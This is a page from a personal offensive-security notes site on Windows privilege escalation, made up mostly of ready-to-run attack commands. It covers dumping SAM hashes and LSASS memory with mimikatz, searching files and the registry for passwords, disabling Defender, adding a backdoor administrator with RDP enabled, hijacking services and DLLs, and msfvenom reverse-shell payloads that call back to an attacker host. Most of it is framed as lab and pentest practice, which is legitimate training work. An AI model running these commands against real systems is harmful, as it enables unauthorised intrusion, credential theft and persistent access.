Hacknetics
  • Hacknetics
  • Active Directory Management
    • How to Join a Windows 11 PC to a Domain
    • Allow RDP in the domain
  • Active Directory AD Attacks
    • Bloodhound
      • Bloodhound Cypher Queries
    • Impacket-install
    • Kerberos cheatsheet
    • Domain Controllers
    • Overpass The Hash/Pass The Key (PTK)
    • Bloodhound Python
    • Rubeus to Ccache
    • Silver Ticket
    • Golden Ticket
    • Abusing GPO Permissions
    • AppLocker Bypasses
    • SharpView Enumeration
    • DonPapi
    • AD Overview
    • Enumerating Forests
    • NOPAC Priv esc
  • buffer-overflows
    • Buffer Overflows
  • c2-frameworks
    • Sliver
    • Powershell Empire
      • IronPython Empire
    • Metasploit
      • Metasploit Basics
      • Custom MSF Resource Scripts
      • Meterpreter Device Survey
      • Paranoid Mode
    • Pwncat-cs
    • Cobalt Strike
    • Dcrat
      • Modules
      • Builder
      • Dcrat AV Evasion
      • C2 Comms
    • FFM Documentation
  • covering-tracks
    • Evading Logging and Monitoring
    • Linux Logging
    • Tor
    • Windows Log Clearing
    • Ghost Writing Binaries
    • Backdoor Linux Commands
  • Data Exfiltration
  • Exploit Development
    • ROP Finding the vulnerable function
    • Useful Tools for Exploit Dev
    • ropeme
    • Obtaining MSFT Patches for Analysis
    • Mutiny Fuzzer
    • GDB
  • file-transfers
    • Transfering Files
  • lateral-movement
    • Pivoting Enumeration
      • Proxychains and FoxyProxy
      • SSH Tunneling and Port Forwarding
      • Plink.exe
      • socat
      • Chisel
      • SShuttle
  • lin-priv-esc
    • Linux Privilege Escalation
    • Bash Jails
    • ssh agent
  • Things I have Pwn'd before
    • Tomcat
    • Jenkins
  • persistence
    • Linux Persistence
    • Windows Persistence
      • Assign Group Memberships
      • Guest Windows Account Persistence
      • WMI Persist With Event Filters
      • SAM SYSTEM Exfil / Pass The Hash
      • Backdoor Executable
      • Special Privileges and Security Descriptors
      • RID Hijacking
      • Task Scheduler
      • Hijacking File Associations
      • Abusing Services
      • Logon Triggered Persistence
      • MSSQL Enabling xp cmdshell
      • Sticky Keys
      • Using Web Shells
  • recon-enumeration
    • Exploit Research
    • Pentesting DNS
    • Pentesting Kerberos
    • Pentesting FTP
    • Pentesting Email
    • Pentesting SMB
    • Pentesting Redis
    • Banner Grabbing
    • Pentesting Rsync
    • Pentesting MsSql
    • Scanning
    • Pentesting SNMP
    • Pentesting NFS
    • Pentesting LDAP
    • Pentesting Finger
    • User Recon
  • resources
    • resources
    • Youtube / Book List
    • CS/Software Engineer Resources
  • shells
    • Shells
    • web-shells
      • PHP Reverse Shell
      • wwwolf's PHP web shell
  • tool-guides
    • Asymmetric File Encrypt and Decrypt
    • Aws Buckets
    • cewl-crunch
    • Creating a Custom Wordlist
    • evil-winrm
    • Git
    • gobuster
    • Hashcat
    • Hydra User Guide
    • John
    • Linux Basics
    • Mimikatz
    • netcat
    • Nmap
    • nuclei
    • PowerView
    • r2
    • Resources
    • tcpdump
    • T-Shark User Guide
    • tmux
    • ssh
    • Vim
    • Wireshark
    • kwp
    • LAPS
    • KeePass KeeThief
    • FileCryptography.psm1
    • Impacket Pastable Commands
    • crackmapexec Pastable Commands
    • feroxbuster
    • NetExec
    • Ligolo-ng
    • gs-netcat
    • Scarecrow
  • Web Path
    • Testing for LFI
    • Testing for RFI
    • Testing for SQL
    • Testing for XSS
    • Authentication Bypass
    • Cmd Injection
    • Javascript Vulnerabilities
    • SSTI
    • Web Servers
    • JWT Tokens
    • Adobe Coldfusion
    • NoSQL Injection
    • vhost Enumeration
  • Wifi/Bluetooth/ZigBee/SDR/SmartCards
    • Wifi Capture Filters
    • Bluetooth Basics
    • Wifi Overview
    • Bettercap Bluetooth / Wifi
    • Aircrack-ng
    • Airdecap-ng
    • Aireplay-ng
    • RTL-SDR Radio
    • Bluetooth Low Energy
    • Smart Cards
    • Airodump-ng Airgraph-ng
    • gqrx
  • Windows
    • powershell-cheatsheet
    • Windows Privlage Escalation
    • Anti-Virus Evasion
    • Windows Registry
    • exploits
      • printspoofer
    • Windows Kernel Vulnerabilities
    • Windows Defender
    • AMSI Bypasses
    • pktmon Packet Capture Windows
    • Powershell Constrained Language Mode
    • Windows Survey
    • Windows Persistence
    • Windows World Writeable Dirs
  • firewalls
    • iptables
    • ufw
    • netsh advfirewall
  • Malware Analysis
    • Malware Analysis Fundamentals
    • Packer Identification by File section names
    • Analyzing Malicious Documents
    • In Depth Malware Analysis
    • Reversing Malicious Code
  • Infrastructure Development
    • SSL Cert Generation
    • Pfsense
      • OpenVPN Server on Pfsense
    • Proxmox OVA Import
  • Python3 Reference
    • Python3 Cheatsheet
    • Regex Python3
  • EDR
    • Velociraptor EDR
  • Host Forensics
    • Windows Host Forensics
    • Windows NT Versions
    • Windows Logs
  • Cloud
    • AWS
  • OSINT
    • Spiderfoot
    • Shodan Dorks
  • Phishing
  • Random
  • Linux
    • awk
    • cut
    • grep
    • sort
    • Cups CVE2024
  • Windows Malware Development
    • Win32 API
    • Processes Threads Handles
      • Message Box Example (Basic)
      • CreateProcess Example (Basic)
  • Golang
  • Mikrotik
  • Firmware Reversing
Powered by GitBook
On this page
  • Windows Privlage Escalation
  • Resources
  • Low Hanging Fruit
  • SeBackupPrivilege
  • Search for files with passwords in them
  • Unattended Setup
  • Search Registry for Passwords
  • Powershell
  • Scripts
  • Run PowerUp
  • Kernel Exploits
  • Admin Service that a Standard User can run
  • Run Executable in Background
  • Disable/Enable Group Policy
  • Add Admin and Enable RDP
  • SMB File Transfer
  • xfreerdp
  • Basic Enumeration
  • Registry Escalation - Autoruns
  • Registry Escalation AlwaysInstallElevated
  • Service Escalation via Changing binpath
  • Startup Applications
  • DLL Hijacking
  • Service Escalation binPath
  • Unquoted Service Path
  • Hot Potato
  • Password Mining Escalation Configuration Files
  • Password Mining Escalation Memory
  • Kernal Exploits
  • LSASS Credential Dumping

Was this helpful?

Edit on GitHub
  1. Windows

Windows Privlage Escalation

Previouspowershell-cheatsheetNextAnti-Virus Evasion

Last updated 4 months ago

Was this helpful?

Windows Privlage Escalation

Resources

  • https://lolbas-project.github.io/

Windows 10 Exploits:

  • https://github.com/nu11secur1ty/Windows10Exploits

Low Hanging Fruit 

whoami /priv 
SeImpersonatePrivilege -> PrintSpoofer, Juicy Potato, Rogue Potato, Hot Potato
SeAssignPrimaryTokenPrivilege -> Juicy Potato 
SeTakeOwnershipPrivilege ->  become the owner of any object and modify the DACL to grant access.  
SeBackup-> can create copy of sam system and run impacket script to dump hashes


If the machine is >= Windows 10 1809 & Windows Server 2019 - Try Rogue Potato
If the machine is < Windows 10 1809 < Windows Server 2019 - Try Juicy Potato

  • Check the current tokens you have and any ability to escalate from your tokens 

  • https://github.com/gtworek/Priv2Admin
https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation

SeBackupPrivilege

  • from sliver session can see privs 

getprivs

Privilege Information for cicada.htb.exe (PID: 3848)
----------------------------------------------------

Process Integrity Level: High

Name                          	Description                    	Attributes
====                          	===========                    	==========
SeBackupPrivilege             	Back up files and directories  	Enabled, Enabled by Default
SeRestorePrivilege            	Restore files and directories  	Enabled, Enabled by Default
SeShutdownPrivilege           	Shut down the system           	Enabled, Enabled by Default
SeChangeNotifyPrivilege       	Bypass traverse checking       	Enabled, Enabled by Default
SeIncreaseWorkingSetPrivilege 	Increase a process working set 	Enabled, Enabled by Default

  • backup the registry hives 

cmd /c "reg save HKLM\SAM SAM & reg save HKLM\SYSTEM SYSTEM"
cmd /c "reg save HKLM\SAM SAM & reg save HKLM\SYSTEM SYSTEM"

  • download files and then use impacket secretsdump.py

python3 /opt/impacket/examples/secretsdump.py -sam SAM -system SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Search for files with passwords in them

  • Perform a basic search

#in one shot, may take a while
findstr /SI /M "password" *.xml *.ini *.txt  
#seperate commands
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

dir c:\*password* /s
dir c:\*pass* /s
dir c:\*login* /s
dir c:\*finance* /s
dir c:\*.key /s
dir c:\*.ica /s
dir c:\*.pwd* /s
dir c:\*.config* /s
dir c:\*access* /s

# Powershell finds 
Get-ChildItem -Path "C:\Users" -Filter *.doc -Recurse
Get-ChildItem -Path "C:\Users" -Filter *.xlxs -Recurse
Get-ChildItem -Path "C:\Users" -Filter *.xls -Recurse

  • Find strings in .config files

dir /s *pass* == *cred** == *vnc* == *.config*

  • Find all passwords in all files

findstr /spin "password" *.*

Unattended Setup

  • Unattended Setup is the method by which original equipment manufacturers (OEMs), corporations, and other users install Windows NT in unattended mode."

  • Unattended Setup is the method by which original equipment manufacturers (OEMs), corporations, and other users install Windows NT in unattended mode." It is also where users passwords are stored in base64. Navigate to:

  • Password files that could have base64 encoded credentials 

Unattended files
dir C:\Windows\sysprep\sysprep.xml
dir C:\Windows\sysprep\sysprep.inf
dir C:\Windows\sysprep.inf
dir C:\Windows\Panther\Unattended.xml
dir C:\Windows\Panther\Unattend.xml
dir C:\Windows\Panther\Unattend\Unattend.xml
dir C:\Windows\Panther\Unattend\Unattended.xml
dir C:\Windows\System32\Sysprep\unattend.xml
dir C:\Windows\System32\Sysprep\unattended.xml
dir C:\unattend.txt
dir C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

dir C:\*.vnc.ini /s /b
dir C:\*ultravnc.ini /s /b
dir C:\ /s /b | findstr /si *vnc.ini

Search Registry for Passwords

reg query HKLM /f password /t REG_SZ /s      #admin needed
reg query HKCU /f password /t REG_SZ /s

Powershell

powershell.exe -nop -ep bypass    
Get-ExecutionPolicy    
Set-ExecutionPolicy Unrestricted   
Set-MpPreference -DisableRealtimeMonitoring $true

  • Powershell history

  • Windows powershell saves all previous commands into a file called ConsoleHost_history.txt This is located at:

dir %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Windows Kernel Versions

  • systeminfo

Kernel 6.1 - Windows 7 / Windows Server 2008 R2  
Kernel 6.2 - Windows 8 / Windows Server 2012  
Kernel 6.3 - Windows 8.1 / Windows Server 2012 R2  
Kernel 10 - Windows 10 / Windows Server 2016 / Windows Server 2019 / Windows 11 / Windows Server 2022

Important Files

dir %SYSTEMROOT%\System32\drivers\etc\hosts                   #local DNS entries 
dir %SYSTEMROOT%\System32\drivers\etc\networks                #network config
dir %SYSTEMROOT%\Prefetch                                     #prefetch dir, exe logs
dir %WINDIR%\system32\config\AppEvent.Evt                     #application logs
dir %WINDIR%\system32\config\SecEvent.Evt                     #security logs

Scripts

Run PowerUp

. .\PowerUp.ps1
Invoke-AllChecks

Kernel Exploits

  • https://github.com/SecWiki/windows-kernel-exploits

Admin Service that a Standard User can run

  • https://www.youtube.com/watch?v=3BQKpPNlTSo

Run Executable in Background

start /B program

Disable/Enable Group Policy

  • Disable:

REG add "HKCU\Software\Policies\Microsoft\MMC{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 1 /f

  • enable 

REG add "HKCU\Software\Policies\Microsoft\MMC{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /0 REG_DWORD /d 1 /f

Add Admin and Enable RDP

Add Admin & Enable RDP
net user /add hacked Password1
net localgroup administrators hacked /add
net localgroup Administrateurs hacked /add (For French target)
net localgroup "Remote Desktop Users" hacked /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service type = REMOTEDESKTOP mode = ENABLE scope = CUSTOM addresses = 10.0.0.1

SMB File Transfer

  • On kali box:

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .

  • On Windows (update the IP address with your Kali IP):

copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe

xfreerdp

xfreerdp /v:10.10.25.227 /u:Wade /p:parzival /cert:ignore /drive:/usr/share/windows-resources,share /dynamic-resolution
proxychains -f proxy9051.conf xfreerdp +clipboard /v:10.10.120.5 /d:RLAB /u:'SQL01$' /pth:47b071ssddff02d0f06770137996c /sec:nla /cert:ignore /drive:/home/kali/Documents/htb/rasta/map,share

Credit

  • Taken from Tib3rius

Basic Enumeration

  • Find out the users on the box and enumerate their privlages

net users
net users Administrator

Registry Escalation - Autoruns

  • Detection

  • Open command prompt and type:

C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe

  • In Autoruns, click on the Logon tab.

  • From the listed results, notice that the “My Program” entry is pointing to

C:\Program Files\Autorun Program\program.exe

  • In command prompt type:

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"

  • From the output, notice that the "Everyone" user group has "FILE_ALL_ACCESS" permission on the "program.exe" file.

  • Exploitation

  • Kali VM

  • Open command prompt and type: msfconsole

  • In Metasploit (msf > prompt) type: use multi/handler

  • In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp or windows/x64/shell/reverse_tcp

  • In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

  • In Metasploit (msf > prompt) type: run

  • Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe

  • Copy the generated file, program.exe, to the Windows VM.

  • Windows VM

  • Place program.exe in C:\Program Files\Autorun Program

  • To simulate the privilege escalation effect, logoff and then log back on as an administrator user.

  • Kali VM

  • Wait for a new session to open in Metasploit.

  • In Metasploit (msf > prompt) type: sessions -i [Session ID]

  • To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid

Registry Escalation AlwaysInstallElevated

  • Detection

  • Windows VM

  • Open command prompt and type:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

  • From the output, notice that AlwaysInstallElevated value is 1.

  • In command prompt type:

reg query HKCU\Software\Policies\Microsoft\Windows\Installer

  • From the output, notice that AlwaysInstallElevated value is 1.

  • Exploitation

  • Kali VM

  • Open command prompt and type: msfconsole

  • In Metasploit (msf > prompt) type: use multi/handler

  • In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp or windows/shell_reverse_tcp

  • In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

  • In Metasploit (msf > prompt) type: run

  • Open an additional command prompt and type:

msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi

  • Copy the generated file, setup.msi, to the Windows VM.

Windows VM

  • Place setup.msi in C:\Temp.

  • Open command prompt and type:

msiexec /quiet /qn /i C:\Temp\setup.msi

Service Escalation via Changing binpath

  • Query the interesting service

sc.exe qc IObitUnSvr
SERVICE_NAME: IObitUnSvr
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : 
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : IObit Uninstaller Service
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem

  • You notice that you cannot swap out the legit exe, or modify the directory the exe is in, however you can edit the binpath

sc.exe config IObitUnSvr binPath= "C:\Users\dharding\Desktop\sliver.exe"
[SC] ChangeServiceConfig SUCCESS
PS C:\Windows\System32\spool\drivers\color> sc.exe start IObitUnSvr
sc.exe start IObitUnSvr
# get session
[*] Session 12b37889 dante-dc01 - 10.10.14.2:52042 (LOCAL-WS02) - windows/amd64 - Tue, 07 May 2024 18:18:15 EDT

Startup Applications

  • Detection

  • Windows VM

  • Open command prompt and type: icacls.exe

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

  • From the output notice that the BUILTIN\Users group has full access (F) to the directory.

  • Exploitation

  • Kali VM

  • Open command prompt and type: msfconsole

  • In Metasploit (msf > prompt) type: use multi/handler

  • In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp or windows/shell_reverse_tcp

  • In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

  • In Metasploit (msf > prompt) type: run

  • Open another command prompt and type: msfvenom -p windows/shell_reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe

  • Copy the generated file, x.exe, to the Windows VM.

  • Windows VM

  • Place x.exe in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

  • Logoff.

  • Login with the administrator account credentials.

  • Kali VM

  • Wait for a session to be created, it may take a few seconds.

  • In Meterpreter(meterpreter > prompt) type: getuid or whoami

  • From the output, notice the user is User-PC\Admin

DLL Hijacking

  • Detection

  • Windows VM

  • Open the Tools folder that is located on the desktop and then go the Process Monitor folder.

  • In reality, executables would be copied from the victim’s host over to the attacker’s host for analysis during run time.

  • Alternatively, the same software can be installed on the attacker’s host for analysis, in case they can obtain it. To simulate this, right click on Procmon.exe and select Run as administrator from the menu.

  • In procmon, select filter. From the left-most drop down menu, select Process Name.

  • In the input box on the same line type: dllhijackservice.exe

  • Make sure the line reads Process Name is dllhijackservice.exe then Include and click on the Add button, then Apply and lastly on OK.

  • Next, select from the left-most drop down menu Result.

  • In the input box on the same line type: NAME NOT FOUND

  • Make sure the line reads Result is NAME NOT FOUND then Include and click on the Add button, then Apply and lastly on OK.

  • Open command prompt and type:

sc start dllsvc

  • Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute C:\Temp\hijackme.dll yet it could not do that as the file was not found. Note that C:\Temp is a writable location.

  • Exploitation

  • Windows VM

  • Copy C:\Users\User\Desktop\Tools\Source\windows_dll.c to the Kali VM.

  • Kali VM

  • Open windows_dll.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add

  • Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

  • Copy the generated file hijackme.dll, to the Windows VM.

  • Windows VM

  • Place hijackme.dll in C:\Temp.

  • Open command prompt and type: sc stop dllsvc & sc start dllsvc

  • It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt:

net localgroup administrators

Service Escalation binPath

  • Detection

  • Windows VM

  • Open command prompt and type:

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc

  • Notice that the output suggests that the user User-PC\User has the SERVICE_CHANGE_CONFIG permission.

  • Exploitation

  • Windows VM

  • In command prompt type: sc config daclsvc binpath= "net localgroup administrators user /add"

  • In command prompt type: sc start daclsvc

  • It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Unquoted Service Path

  • Find vulnerable services with this command without PowerUp

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

  • Open command prompt and type: sc qc unquotedsvc

  • Notice that the BINARY_PATH_NAME field displays a path that is not confined between quotes.

  • Exploitation

  • Kali VM

  • Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe

  • Copy the generated file, common.exe, to the Windows VM.

  • Windows VM

  • Place common.exe in "C:\Program Files\Unquoted Path Service".

  • Open command prompt and type: sc start unquotedsvc

  • It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Hot Potato

  • Exploitation

  • Windows VM

  • In command prompt type: powershell.exe -nop -ep bypass

  • In Power Shell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1

  • In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"

  • To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators

Password Mining Escalation Configuration Files

  • Exploitation

  • Windows VM

  • Open command prompt and type: notepad C:\Windows\Panther\Unattend.xml

  • Scroll down to the "<Password>" property and copy the base64 string that is confined between the "<Value>" tags underneath it.

  • Kali VM

  • In a terminal, type: echo [copied base64] | base64 -d

  • Notice the cleartext password

Password Mining Escalation Memory

  • Exploitation

  • Kali VM

  • Open command prompt and type: msfconsole

  • In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic

  • In Metasploit (msf > prompt) type: set uripath x

  • In Metasploit (msf > prompt) type: run

  • Windows VM

  • Open Internet Explorer and browse to: http://[Kali VM IP Address]/x

  • Open command prompt and type: taskmgr

  • In Windows Task Manager, right-click on the iexplore.exe in the Image Name columnand select Create Dump File from the popup menu.

  • Copy the generated file, iexplore.DMP, to the Kali VM.

  • Kali VM

  • Place iexplore.DMP on the desktop.

  • Open command prompt and type: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"

  • Select the Copy the Base64 encoded string.

  • In command prompt type: echo -ne [Base64 String] | base64 -d

  • Notice the credentials in the output.

Kernal Exploits

  • Establish a shell

  • Kali VM

  • Open command prompt and type: msfconsole

  • In Metasploit (msf > prompt) type: use multi/handler

  • In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp

  • In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

  • In Metasploit (msf > prompt) type: run

  • Open an additional command prompt and type: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe > shell.exe

  • Copy the generated file, shell.exe, to the Windows VM.

  • Windows VM

  • Execute shell.exe and obtain reverse shell

  • Detection & Exploitation

  • Kali VM

  • In Metasploit (msf > prompt) type: run post/multi/recon/local_exploit_suggester

  • Identify exploit/windows/local/ms16_014_wmi_recv_notif as a potential privilege escalation

  • In Metasploit (msf > prompt) type: use exploit/windows/local/ms16_014_wmi_recv_notif

  • In Metasploit (msf > prompt) type: set SESSION [meterpreter SESSION number]

  • In Metasploit (msf > prompt) type: set LPORT 5555

  • In Metasploit (msf > prompt) type: run

LSASS Credential Dumping

  • use procdump 

procdump.exe -accepteula -ma lsass.exe C:\Users\Administrator\Desktop\lsass.dmp
#either exfil or perform locally 
mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonpasswords

You might want to check for AV first!

OS privileges to system

HackTricks
Fuzzy security
https://wadcoms.github.io/
Reference
https://github.com/gtworek/Priv2Admin/blob/master/SeBackupPrivilege.md
Scripts Reference
winPEAS
Other compiled binaries
nishang
JAWS
PowerSploit
PrivEscCheck
Windows Exploit Suggester (Next-Generation)
Sherlock
Priv2Admin
Compiled scripts here